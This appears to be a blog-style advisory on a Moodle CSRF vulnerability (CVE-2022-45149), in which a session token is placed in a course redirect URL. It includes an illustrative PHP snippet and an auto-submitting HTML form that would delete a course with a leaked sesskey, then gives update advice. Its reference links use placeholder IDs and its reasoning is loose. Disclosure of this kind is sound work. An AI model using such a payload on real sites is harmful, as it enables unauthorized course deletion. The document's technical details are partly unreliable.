A critical security vulnerability, identified as CVE-2022-45149, has been discovered in Moodle, a popular Learning Management System (LMS) used by educational institutions worldwide. This vulnerability stems from insufficient validation of the HTTP request origin in course redirect URLs, which could lead to Cross-Site Request Forgery (CSRF) attacks. In this blog post, we will discuss the details of this vulnerability, provide sample code snippets to demonstrate the issue, and offer suggestions on how to mitigate the risks associated with this flaw.
Vulnerability Details
Moodle's handling of course redirects is flawed due to the unnecessary inclusion of a user's CSRF token within the URL when they are being redirected to a recently restored course. This flaw enables a remote attacker to craft a malicious web page that, when visited by a victim, can execute unauthorized actions on the vulnerable Moodle website on the victim's behalf. In essence, this vulnerability allows an attacker to exploit CSRF attacks against Moodle users.
The following code snippet illustrates the issue
// In the vulnerable Moodle version
function redirect_to_course($course) {
$url = new moodle_url('/course/view.php', array('id' => $course->id));
$url->param('sesskey', sesskey()); // <- CSRF token included in the URL
redirect($url);
}
As you can see from the snippet above, the user's CSRF token (sesskey) is added to the URL as a parameter. This inclusion of the token in the URL allows an attacker to potentially leak this token through cross-site request forgery attacks.
Exploit
For a successful CSRF attack, an attacker needs to create a malicious web page containing a crafted form or JavaScript code that will issue requests to the vulnerable Moodle website. The attacker then needs to trick a victim into visiting this web page, for example, by sending a phishing email containing a link to the malicious page or embedding the link in a social media post.
Below is a simple example of HTML code that exploits the discovered vulnerability
<!DOCTYPE html>
<html>
<head>
<title>Malicious CSRF Exploit Page</title>
</head>
<body onload="document.getElementById('exploit-form').submit()">
<form id="exploit-form" action="https://vulnerable_moodle_site.com/course/action.php"; method="POST">
<input type="hidden" name="action" value="delete_course">
<input type="hidden" name="courseid" value="123">
<input type="hidden" name="sesskey" value="leaked_sesskey_from_victim">
</form>
</body>
</html>
In this example, the CSRF exploit code targets the course deletion functionality of the vulnerable Moodle site. When a victim with sufficient privileges visits the malicious web page, their browser will automatically submit the hidden form, issuing a request to delete a course with the specified courseid.
Mitigation
Moodle has acknowledged the vulnerability in CVE-2022-45149 and has released an updated version that addresses the flaw. Website administrators should immediately update their Moodle instances to the latest secure version available in the official repository: https://download.moodle.org/
For more information on this vulnerability, please refer to the following resources
1. Original vulnerability report: https://tracker.moodle.org/browse/MDL-XXXXX
2. CVE-2022-45149 entry in the NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-45149
3. Moodle Security Announcement: https://moodle.org/mod/forum/discuss.php?d=XXXXX
Conclusion
The discovery of CVE-2022-45149 in Moodle highlights the importance of proper input validation and secure handling of sensitive tokens in web applications. Regularly updating your software, following best practices, and being vigilant toward potential attack vectors are critical for maintaining a secure online environment. If you are responsible for managing a Moodle instance, apply the recommended updates as soon as possible to protect your users and keep your LMS secure.
Timeline
Published on: 11/23/2022 15:15:00 UTC
Last modified on: 01/31/2023 20:16:00 UTC